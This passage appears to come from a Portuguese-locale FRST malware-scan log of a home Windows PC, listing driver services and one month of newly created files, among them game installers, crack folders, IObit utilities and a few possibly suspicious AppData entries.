R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R0 SmartDefragDriver; C:\WINDOWS\System32\Drivers\SmartDefragDriver.sys [30744 2017-03-09] (IObit)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [221824 2016-04-24] (Samsung Electronics Co., Ltd.)
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [66136 2017-02-16] (Synaptics Incorporated)
R3 usb3Hub; C:\WINDOWS\System32\drivers\usb3Hub.sys [213296 2014-10-15] (Windows ® Win 7 DDK provider)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R1 YSDrv; C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys [270608 2017-07-17] (BigNox Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
 
==================== Um Mês Criados arquivos e pastas ========
 
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
 
2017-08-03 14:20 - 2017-08-03 15:34 - 000023347 _____ C:\Users\Hercílio\Desktop\FRST.txt
2017-08-03 14:18 - 2017-08-03 14:18 - 002381312 _____ (Farbar) C:\Users\Hercílio\Downloads\FRST64 (1).exe
2017-08-03 14:18 - 2017-08-03 14:18 - 002381312 _____ (Farbar) C:\Users\Hercílio\Desktop\FRST64.exe
2017-08-03 13:08 - 2017-08-03 13:08 - 000003040 _____ C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (Hercílio)
2017-08-03 11:15 - 2017-08-03 11:15 - 001835008 _____ C:\Users\Hercílio\AppData\Roaming\pxese.exe
2017-08-03 08:19 - 2017-08-03 08:19 - 000936976 _____ C:\Users\Hercílio\AppData\Roaming\F348644F8C8E38493023A2CA41BE1BED
2017-08-03 08:19 - 2017-08-03 08:19 - 000253456 _____ C:\Users\Hercílio\AppData\Roaming\E7BD4BE3219227505EC81A001EF0D262
2017-08-03 08:19 - 2017-08-03 08:19 - 000245264 _____ C:\Users\Hercílio\AppData\Roaming\766304432F4B4AF71668BA8EE91BAB73
2017-08-03 08:19 - 2017-08-03 08:19 - 000232464 _____ C:\Users\Hercílio\AppData\Roaming\F70555010177884C9C2184467F078255
2017-08-03 08:19 - 2017-08-03 08:19 - 000047120 _____ C:\Users\Hercílio\AppData\Roaming\78DF6D034C85415260CC2E9412198DB6
2017-08-03 08:16 - 2017-08-03 12:53 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\tor
2017-08-03 07:57 - 2017-08-03 08:03 - 000000000 ____D C:\FRST
2017-08-03 07:55 - 2017-08-03 07:55 - 001777664 _____ (Farbar) C:\Users\Hercílio\Downloads\FRST.exe
2017-08-01 08:46 - 2017-08-01 08:46 - 000000000 ____D C:\Users\Hercílio\Downloads\EnderalInstall_EN
2017-07-31 22:25 - 2017-07-31 23:17 - 4132997235 _____ C:\Users\Hercílio\Downloads\EnderalInstall_EN.gz
2017-07-31 22:25 - 2017-07-31 22:25 - 000020704 _____ C:\Users\Hercílio\Downloads\EnderalInstall_EN.torrent
2017-07-31 15:48 - 2017-07-31 15:48 - 000002570 _____ C:\Users\Hercílio\Desktop\Skyrim (SKSE).lnk
2017-07-31 15:47 - 2017-07-31 15:47 - 000362812 _____ C:\Users\Hercílio\Downloads\skse_1_07_03_installer.exe
2017-07-31 14:48 - 2017-07-31 14:48 - 000000000 ____D C:\Users\Hercílio\AppData\LocalLow\Dire Wolf Digital
2017-07-31 14:26 - 2017-07-31 14:29 - 000000000 ____D C:\Users\Hercílio\Documents\Nexus Mod Manager
2017-07-31 14:26 - 2017-07-31 14:26 - 006441096 _____ (Black Tree Gaming ) C:\Users\Hercílio\Downloads\Nexus Mod Manager-0.63.14.exe
2017-07-31 14:26 - 2017-07-31 14:26 - 000000943 _____ C:\Users\Public\Desktop\Nexus Mod Manager.lnk
2017-07-31 14:26 - 2017-07-31 14:26 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Black_Tree_Gaming
2017-07-31 14:26 - 2017-07-31 14:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexus Mod Manager
2017-07-31 14:26 - 2017-07-31 14:26 - 000000000 ____D C:\Program Files\Nexus Mod Manager
2017-07-31 13:30 - 2017-07-31 13:30 - 000000257 _____ C:\Users\Hercílio\Desktop\The Elder Scrolls Legends.url
2017-07-31 13:27 - 2017-07-31 13:30 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Bethesda.net Launcher
2017-07-31 13:25 - 2017-08-01 08:50 - 000000000 ____D C:\Program Files (x86)\Bethesda.net Launcher
2017-07-31 13:25 - 2017-07-31 13:25 - 009048248 _____ (Bethesda Softworks ) C:\Users\Hercílio\Downloads\BethesdaNetLauncher_Setup.exe
2017-07-31 13:25 - 2017-07-31 13:25 - 000001241 _____ C:\Users\Public\Desktop\Bethesda.net Launcher.lnk
2017-07-31 13:25 - 2017-07-31 13:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda.net Launcher
2017-07-28 22:51 - 2017-07-28 22:52 - 002267136 _____ C:\Users\Hercílio\Downloads\c6d4ec44-12d1-4dc1-8cfb-20cc41737de7.tmp
2017-07-27 15:31 - 2017-07-27 16:07 - 077045332 _____ C:\Users\Hercílio\Downloads\PUNCH_Hajimete_no_Gal_-_02_MQ.mp4
2017-07-23 23:22 - 2017-07-23 23:22 - 000002053 _____ C:\Users\Hercílio\Desktop\Crashlands.exe.lnk
2017-07-23 13:53 - 2017-07-23 14:04 - 000000000 ____D C:\Users\Hercílio\Downloads\The.Banner.Saga-RELOADED
2017-07-23 11:15 - 2017-07-23 11:15 - 000000000 ____D C:\Users\Hercílio\Downloads\Crashlands.v1.2.3.0.Incl.Soundtrack
2017-07-23 09:09 - 2017-07-23 09:48 - 517766079 _____ C:\Users\Hercílio\Downloads\Crashlands.v1.2.3.0.Incl.Soundtrack.rar
2017-07-21 09:18 - 2017-07-21 09:18 - 004490460 _____ C:\Users\Hercílio\Downloads\Mini-Warriors-Hack-Tool-AndroidiOS.rar
2017-07-20 10:54 - 2017-07-20 10:54 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\MobiKin
2017-07-20 10:54 - 2017-07-20 10:54 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MobiKin
2017-07-20 10:54 - 2017-07-20 10:54 - 000000000 ____D C:\Program Files (x86)\MobiKin
2017-07-20 10:52 - 2017-07-20 10:53 - 014455408 _____ C:\Users\Hercílio\Downloads\mobikin-doctor-for-android.exe
2017-07-20 10:50 - 2017-07-20 10:50 - 000000000 ____D C:\Users\Todos os Usuários\wsr
2017-07-20 10:50 - 2017-07-20 10:50 - 000000000 ____D C:\ProgramData\wsr
2017-07-20 10:37 - 2017-07-20 10:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2017-07-20 10:36 - 2017-07-20 10:37 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\Wondershare
2017-07-20 10:36 - 2015-02-27 10:35 - 000000232 _____ C:\WINDOWS\SysWOW64\dllhost.exe.config
2017-07-20 10:29 - 2017-07-20 10:30 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2017-07-20 10:29 - 2017-07-20 10:29 - 001164944 _____ C:\Users\Hercílio\Downloads\drfone-for-android_setup_full1546.exe
2017-07-20 10:19 - 2017-07-20 10:54 - 000000000 ____D C:\Users\Todos os Usuários\Wondershare
2017-07-20 10:19 - 2017-07-20 10:54 - 000000000 ____D C:\ProgramData\Wondershare
2017-07-20 10:19 - 2017-07-20 10:54 - 000000000 ____D C:\Program Files (x86)\Wondershare
2017-07-20 10:19 - 2017-07-20 10:19 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Wondershare
2017-07-20 10:16 - 2017-07-20 10:18 - 000000000 ____D C:\Users\Hercílio\Downloads\Wondershare Data Recovery 5.0.0.5 FINAL + Crack [TechTools.net]
2017-07-20 10:15 - 2017-07-20 10:15 - 022790320 _____ (EaseUS ) C:\Users\Hercílio\Downloads\drw_trial.exe
2017-07-19 22:00 - 2017-07-19 22:00 - 000003272 _____ C:\WINDOWS\System32\Tasks\PCDoctorBackgroundMonitorTask-Delay
2017-07-19 14:07 - 2017-07-19 14:12 - 085787222 _____ C:\Users\Hercílio\Downloads\PUNCH_Knights_and_Magic_-_03_MQ.mp4
2017-07-19 10:17 - 2017-07-19 10:17 - 000873037 _____ C:\Users\Hercílio\Downloads\leomoon-cpu-v.zip
2017-07-18 00:13 - 2017-07-18 00:17 - 092073258 _____ C:\Users\Hercílio\Downloads\PUNCH_Boku_no_Hero_Academia_2_-_15_MQ.mp4
2017-07-17 07:50 - 2017-07-23 13:56 - 000000000 ____D C:\Users\Hercílio\.android
2017-07-17 07:49 - 2017-07-23 13:55 - 000000000 ____D C:\Users\Hercílio\vmlogs
2017-07-17 07:49 - 2017-07-23 13:55 - 000000000 ____D C:\Users\Hercílio\.BigNox
2017-07-17 07:49 - 2017-07-17 07:49 - 000001129 _____ C:\Users\Hercílio\Desktop\Multi-Drive.lnk
2017-07-17 07:49 - 2017-07-17 07:49 - 000001038 _____ C:\Users\Hercílio\Desktop\Nox.lnk
2017-07-17 07:49 - 2017-07-17 07:49 - 000000045 _____ C:\Users\Hercílio\nuuid.ini
2017-07-17 07:49 - 2017-07-17 07:49 - 000000041 _____ C:\Users\Hercílio\inst.ini
2017-07-17 07:49 - 2017-07-17 07:49 - 000000000 ____D C:\Users\Herc�lio\AppData\Local\Nox
2017-07-17 07:49 - 2017-07-17 07:49 - 000000000 ____D C:\Users\Hercílio\Nox_share
2017-07-17 07:49 - 2017-07-17 07:49 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\Microsoft\Windows\Start Menu\Nox
2017-07-17 07:49 - 2017-07-17 07:49 - 000000000 ____D C:\Program Files (x86)\Bignox
2017-07-17 07:48 - 2017-07-17 07:48 - 000000000 ____D C:\Program Files (x86)\Nox
2017-07-17 07:47 - 2017-07-23 14:02 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Nox
2017-07-16 23:10 - 2017-07-16 23:16 - 295309704 _____ (Duodian Technology Co. Ltd.) C:\Users\Hercílio\Downloads\nox_setup_v3.8.3.1_full_intl.exe
2017-07-15 10:48 - 2017-07-15 10:48 - 000000000 ____D C:\Users\Todos os Usuários\Orbit
2017-07-15 10:48 - 2017-07-15 10:48 - 000000000 ____D C:\ProgramData\Orbit
2017-07-15 10:27 - 2017-07-15 10:27 - 000001556 _____ C:\Users\Hercílio\Desktop\Might and Magic Heroes VII.lnk
2017-07-15 10:27 - 2017-07-15 10:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Might and Magic Heroes VII
2017-07-15 10:06 - 2017-07-15 10:37 - 000000000 ____D C:\Program Files (x86)\Might and Magic Heroes VII
2017-07-15 09:11 - 2017-07-15 10:45 - 000000000 ____D C:\Program Files\Might and Magic Heroes VII
2017-07-14 19:48 - 2017-07-14 19:49 - 000000000 ____D C:\Users\Hercílio\Desktop\Programas
2017-07-14 19:35 - 2017-07-14 19:35 - 093810688 _____ C:\WINDOWS\system32\config\SOFTWARE.iobit
2017-07-14 19:35 - 2017-07-14 19:35 - 004177920 _____ C:\WINDOWS\system32\config\DEFAULT.iobit
2017-07-14 19:35 - 2017-07-14 19:35 - 000061440 _____ C:\WINDOWS\system32\config\SAM.iobit
2017-07-14 19:35 - 2017-07-14 19:35 - 000028672 _____ C:\WINDOWS\system32\config\SECURITY.iobit
2017-07-14 19:34 - 2017-07-14 19:34 - 000003392 _____ C:\WINDOWS\System32\Tasks\SuperbGameBoost
2017-07-14 19:34 - 2017-07-14 19:34 - 000000000 ____D C:\Users\Todos os Usuários\SuperBoost
2017-07-14 19:34 - 2017-07-14 19:34 - 000000000 ____D C:\ProgramData\SuperBoost
2017-07-14 19:33 - 2017-07-14 19:33 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\SuperBoost
2017-07-14 19:33 - 2017-07-14 19:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Superb Game Boost
2017-07-14 19:33 - 2017-07-14 19:33 - 000000000 ____D C:\Program Files (x86)\SuperBoost
2017-07-14 19:33 - 2016-01-29 15:21 - 000276800 _____ C:\WINDOWS\SysWOW64\D3DX8Wrapper.dll
2017-07-14 19:33 - 2016-01-29 15:21 - 000229184 _____ (easyhook.codeplex.com) C:\WINDOWS\SysWOW64\EasyHook32.dll
2017-07-14 19:29 - 2017-07-14 19:29 - 000480800 _____ (Intel® Corporation) C:\WINDOWS\system32\Drivers\IntcDAud.sys
2017-07-14 19:18 - 2017-07-14 19:18 - 004332032 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtCRU64.exe
2017-07-14 19:18 - 2017-07-14 19:18 - 000419296 _____ (Realsil Semiconductor Corporation) C:\WINDOWS\system32\Drivers\RtsUer.sys
2017-07-14 19:17 - 2017-07-14 19:17 - 000001115 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Waves MaxxAudioPro.lnk
2017-07-14 19:17 - 2017-07-14 19:17 - 000000000 ____D C:\Program Files\Waves
2017-07-14 19:12 - 2017-07-14 19:12 - 072520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCORES64.dat
2017-07-14 19:12 - 2017-07-14 19:12 - 009124224 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
2017-07-14 19:12 - 2017-07-14 19:12 - 007172912 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EEP64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 007096184 _____ (Dolby Laboratories) C:\WINDOWS\system32\DDPP64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 003203584 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 003014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
2017-07-14 19:12 - 2017-07-14 19:12 - 002201600 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001965808 _____ (Dolby Laboratories) C:\WINDOWS\system32\DDPD64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001780616 _____ (DTS) C:\WINDOWS\system32\DTSS2SpeakerDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001591056 _____ (DTS) C:\WINDOWS\system32\DTSS2HeadphoneDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001508928 _____ (DTS) C:\WINDOWS\system32\DTSBoostDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001353824 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000743960 _____ (DTS) C:\WINDOWS\system32\DTSBassEnhancementDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000727432 _____ (DTS) C:\WINDOWS\system32\DTSSymmetryDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000708312 _____ (DTS) C:\WINDOWS\system32\DTSVoiceClarityDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000689880 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000504304 _____ (DTS) C:\WINDOWS\system32\DTSNeoPCDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000447720 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EED64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000445400 _____ (DTS) C:\WINDOWS\system32\DTSLimiterDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000441264 _____ (DTS) C:\WINDOWS\system32\DTSGainCompensatorDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000327456 _____ (Dolby Laboratories) C:\WINDOWS\system32\DDPO64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000272712 _____ (Dolby Laboratories) C:\WINDOWS\system32\DDPA64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000253896 _____ (DTS) C:\WINDOWS\system32\DTSGFXAPO64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000253864 _____ (DTS) C:\WINDOWS\system32\DTSLFXAPO64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000252872 _____ (DTS) C:\WINDOWS\system32\DTSGFXAPONS64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000221960 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSH64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000209528 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSHP64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000164424 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkXInterface64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000151784 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EEL64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000134200 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EEA64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000084616 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EEG64A.dll
2017-07-14 19:06 - 2017-07-14 19:06 - 000003106 _____ C:\WINDOWS\System32\Tasks\IObitSelfCheckTask
2017-07-14 19:05 - 2017-07-14 19:06 - 000003266 _____ C:\WINDOWS\System32\Tasks\SmartDefrag_AutoAnalyze
2017-07-14 19:05 - 2017-07-14 19:05 - 000003106 _____ C:\WINDOWS\System32\Tasks\SmartDefrag_Startup
2017-07-14 19:05 - 2017-07-14 19:05 - 000003102 _____ C:\WINDOWS\System32\Tasks\SmartDefrag_Update
2017-07-14 19:05 - 2017-07-14 19:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart Defrag
2017-07-14 19:05 - 2017-03-09 13:53 - 000030744 _____ (IObit) C:\WINDOWS\system32\Drivers\SmartDefragDriver.sys
2017-07-14 19:05 - 2016-03-25 14:33 - 000128288 _____ (IObit) C:\WINDOWS\system32\IObitSmartDefragExtension.dll
2017-07-14 19:05 - 2016-03-22 11:02 - 000036824 _____ (IObit) C:\WINDOWS\system32\SmartDefragBootTime.exe
2017-07-14 19:04 - 2017-07-14 19:05 - 010908744 _____ (IObit ) C:\Users\Hercílio\Downloads\smart-defrag-setup.exe
2017-07-14 19:02 - 2017-07-14 19:02 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-14 19:02 - 2017-07-14 19:02 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
2017-07-14 19:00 - 2017-07-14 19:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2017-07-14 19:00 - 2017-03-17 00:57 - 000044096 _____ (IObit.com) C:\WINDOWS\system32\Drivers\IMFCameraProtect.sys
2017-07-14 18:58 - 2017-07-14 22:17 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2017-07-14 18:58 - 2017-07-14 18:58 - 000378040 _____ (Intel Corporation) C:\WINDOWS\system32\ibtproppage.dll
2017-07-14 18:58 - 2017-07-14 18:58 - 000252936 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\ibtusb.sys
2017-07-14 18:57 - 2017-07-14 18:57 - 011221616 _____ C:\WINDOWS\system32\Drivers\Netwfw04.dat
2017-07-14 18:57 - 2017-07-14 18:57 - 003499776 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\Netwsw04.sys
2017-07-14 18:54 - 2017-07-14 18:54 - 000002504 _____ C:\WINDOWS\System32\Tasks\Uninstaller_SkipUac_Hercílio
2017-07-14 18:54 - 2017-07-14 18:54 - 000000306 _____ C:\WINDOWS\Tasks\Uninstaller_SkipUac_Hercílio.job
2017-07-14 18:54 - 2017-07-14 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller
2017-07-14 18:51 - 2017-07-14 18:54 - 014435104 _____ (IObit) C:\Users\Hercílio\Downloads\iobituninstaller.exe
2017-07-14 18:51 - 2017-07-14 18:51 - 000046856 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSS_GPIO.sys
2017-07-14 18:48 - 2017-07-14 18:48 - 000000000 ____D C:\Users\Todos os Usuários\{74E9F814-C737-42CC-B721-DBBC4059367A}
2017-07-14 18:48 - 2017-07-14 18:48 - 000000000 ____D C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
2017-07-14 18:47 - 2017-07-14 18:47 - 000003116 _____ C:\WINDOWS\System32\Tasks\ASC10_PerformanceMonitor
2017-07-14 18:47 - 2017-07-14 18:47 - 000002916 _____ C:\WINDOWS\System32\Tasks\ASC10_SkipUac_Hercílio
2017-07-14 18:47 - 2017-07-14 18:47 - 000000000 ____D C:\WINDOWS\Tasks\ImCleanDisabled
2017-07-14 18:47 - 2017-07-14 18:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare
2017-07-14 18:43 - 2017-07-30 10:51 - 000000000 ____D C:\Users\Todos os Usuários\ProductData
2017-07-14 18:43 - 2017-07-30 10:51 - 000000000 ____D C:\ProgramData\ProductData
2017-07-14 18:43 - 2017-07-14 18:43 - 000000000 ____D C:\WINDOWS\IObit
2017-07-14 18:42 - 2017-07-14 19:05 - 000000000 ____D C:\Program Files (x86)\IObit
2017-07-14 18:42 - 2017-07-14 18:48 - 000000000 ____D C:\Users\Hercílio\AppData\LocalLow\IObit
2017-07-14 18:42 - 2017-07-14 18:42 - 000027552 _____ (REALiX™) C:\WINDOWS\SysWOW64\Drivers\HWiNFO64A.SYS
2017-07-14 18:42 - 2017-07-14 18:42 - 000003390 _____ C:\WINDOWS\System32\Tasks\Driver Booster Scheduler
2017-07-14 18:42 - 2017-07-14 18:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 4
2017-07-14 18:41 - 2017-08-03 11:03 - 000000000 ____D C:\Users\Todos os Usuários\IObit
2017-07-14 18:41 - 2017-08-03 11:03 - 000000000 ____D C:\ProgramData\IObit
2017-07-14 18:41 - 2017-07-14 19:05 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\IObit
2017-07-14 18:41 - 2017-07-14 18:41 - 015721672 _____ (IObit ) C:\Users\Hercílio\Downloads\driver_booster_setup.exe
2017-07-14 18:39 - 2017-07-14 18:41 - 039514624 _____ (IObit ) C:\Users\Hercílio\Downloads\advanced-systemcare-setup.exe
2017-07-14 17:51 - 2017-07-14 17:51 - 000000000 ____D C:\Users\Hercílio\Downloads\IObit Driver Booster Pro 3.3.0.744 FINAL + Crack
2017-07-14 17:38 - 2017-07-14 18:18 - 000000000 ____D C:\Users\Hercílio\Downloads\Might and Magic Heroes VII + All Updates + Crack
2017-07-14 14:56 - 2017-07-14 14:57 - 000000000 ____D C:\Users\Hercílio\Downloads\Doc_Skills_2_1_en
2017-07-14 14:55 - 2017-07-14 14:56 - 000877919 _____ C:\Users\Hercílio\Downloads\Doc_Skills_2_1_en.rar
2017-07-14 14:01 - 2017-07-14 14:01 - 000000006 _____ C:\Users\Hercílio\Documents\mt-e_hook.txt
2017-07-14 13:52 - 2017-07-14 13:52 - 005919905 _____ C:\Users\Hercílio\Downloads\mt-x_setup.rar
2017-07-14 13:52 - 2017-07-14 13:52 - 000000000 ____D C:\Users\Hercílio\Downloads\mt-x_setup
2017-07-14 13:06 - 2017-07-14 13:11 - 000000000 ____D C:\Users\Hercílio\Downloads\maps
2017-07-14 13:04 - 2017-07-14 13:04 - 001570966 _____ C:\Users\Hercílio\Downloads\beowulf_pride_is_the_curse_509.zip
2017-07-14 12:40 - 2017-07-14 12:40 - 000000000 ____D C:\Users\Hercílio\Downloads\Skillwheel
2017-07-14 12:39 - 2017-07-14 12:39 - 002368803 _____ C:\Users\Hercílio\Downloads\Skillwheel.zip
2017-07-14 10:39 - 2017-08-03 11:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
2017-07-14 10:39 - 2017-07-14 10:39 - 000004608 _____ C:\WINDOWS\SECOH-QAD.exe
2017-07-14 10:39 - 2017-07-14 10:39 - 000003584 _____ C:\WINDOWS\SECOH-QAD.dll
2017-07-14 10:38 - 2010-12-05 23:16 - 000090112 _____ (Vestris Inc.) C:\WINDOWS\system32\Vestris.ResourceLib.dll
2017-07-14 10:36 - 2017-07-14 10:37 - 000000000 ____D C:\Users\Hercílio\Downloads\KMSpico 10.1.8 FINAL + Portable (Office and Windows 10 Activator) [TechTools]
2017-07-14 10:36 - 2017-07-14 10:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of Might and Magic V - Tribes of the East [GOG.com]
2017-07-14 10:29 - 2017-07-14 10:42 - 000000000 ____D C:\Program Files (x86)\HoMM 5 - Tribes of the East
2017-07-14 09:52 - 2017-07-14 09:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of Might and Magic V [GOG.com]
2017-07-14 09:50 - 2017-07-14 09:50 - 000000000 ____D C:\Users\Hercílio\Documents\NeocoreGames
2017-07-14 09:49 - 2017-07-14 13:11 - 000000000 ____D C:\Program Files (x86)\Heroes of Might and Magic V
2017-07-14 09:46 - 2017-07-14 09:46 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Deployment
2017-07-14 09:09 - 2017-07-14 10:31 - 000000000 ____D C:\Users\Hercílio\Downloads\Heroes of Might and Magic V Bundle [GOG]
2017-07-13 19:40 - 2017-07-13 19:42 - 054053699 _____ C:\Users\Hercílio\Downloads\hmm6_1.1_efigs.exe
2017-07-13 19:37 - 2017-07-13 19:37 - 000000000 ____D C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.4.ALL.RELOADED.NODVD
2017-07-13 19:37 - 2017-07-13 19:37 - 000000000 ____D C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.2.ALL.RELOADED.NODVD
2017-07-13 19:37 - 2017-07-13 19:37 - 000000000 ____D C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.2.1.ALL.RELOADED.NODVD
2017-07-13 19:37 - 2017-07-13 19:37 - 000000000 ____D C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.1.ALL.PROPHET.NODVD
2017-07-13 19:36 - 2017-07-13 19:37 - 011513131 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.7.1.GE.ALL.SKIDROW.NODVD.ZIPd
2017-07-13 19:34 - 2017-07-13 19:35 - 011361464 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.4.ALL.RELOADED.NODVD.ZIP
2017-07-13 19:32 - 2017-07-13 19:34 - 021756552 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.2.ALL.RELOADED.NODVD.ZIP
2017-07-13 19:32 - 2017-07-13 19:34 - 011267261 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.2.1.ALL.RELOADED.NODVD.ZIP
2017-07-13 19:31 - 2017-07-13 19:32 - 011196271 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.1.ALL.PROPHET.NODVD.ZIP
